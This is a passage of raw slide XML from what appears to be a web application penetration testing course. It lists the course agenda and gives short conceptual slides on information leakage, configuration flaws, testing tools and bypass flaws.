              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information Leakage Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1615440"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information leakage flaws allow an attacker to discover information regarding the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web server type, back-end database type, operating system type, version numbers of each of these, etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pathing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Where are the application components installed on the target machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s file system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can we download the application's code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Where is the backend data store and what is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usernames and/or passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Obvious targets</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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Configuration Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396240" y="1645920"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Configuration issues with the web server or its underlying operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These issues could allow an attacker to exploit the system, no matter how secure the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Commonly caused by miscommunication between what the application needs and the way the server is configured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May disclose information or expose vulnerabilities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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Knowledge of Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213360" y="1615440"/>
            <a:ext cx="5943600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Understand what tools are available and how it integrates into a full testing regimen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Gain in-depth knowledge in the use of each tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Know their strengths and weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Understand common pitfalls and tactics for avoiding them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine how knowledge gleaned from one tool can be fed into another in an integrated test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How to expand or improve tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>At a minimum, developing scripts for automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Developing patches to improve existing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Identifying gaps and creating new tools – There is still plenty of room for innovation in web app testing tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1946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7480" y="1600200"/>
            <a:ext cx="2286000" cy="700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61"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88480" y="2514600"/>
            <a:ext cx="1524000" cy="152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62"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36080" y="4267200"/>
            <a:ext cx="1938338" cy="133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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1615440"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass flaws allow an attacker to bypass or avoid various controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Access the application without logging in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authorization bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Accessing resources not meant for a given user, such as jumping from one user to another or gaining access to administrative functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File control bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Access files outside the web root or not part of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
